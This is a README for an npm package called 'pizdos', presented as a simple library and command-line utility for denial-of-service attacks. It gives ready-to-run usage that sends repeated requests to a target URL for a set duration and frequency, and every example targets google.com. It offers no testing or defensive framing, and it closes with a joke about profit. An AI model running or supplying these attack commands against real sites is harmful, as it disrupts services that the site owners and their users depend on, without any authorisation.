README
pizdos
The stupid-simple library/utility for DoS.
Using
Library-way
Require pizdos and use attack
method. It takes 2 arguments: url
and options
.
For example:
const pizdos = require('pizdos')
pizdos.attack('https://google.com', { duration: 100000 })
options
is an object with attack parameters. By default it looks like this:
{
duration: 60000, // How long will the attack last (milliseconds).
frequency: 100, // How often will requests be sent (milliseconds between requests).
log: console.log // Function for displaying information about the attack.
}
You can change any parameters by passing your object to the attack
method.
Utility-way
- Install it using command
npm i pizdos -g
- Start attack using command
pizdos *url* *duration* *frequency*
- ???
- PROFIT
For example: pizdos https://google.com 100000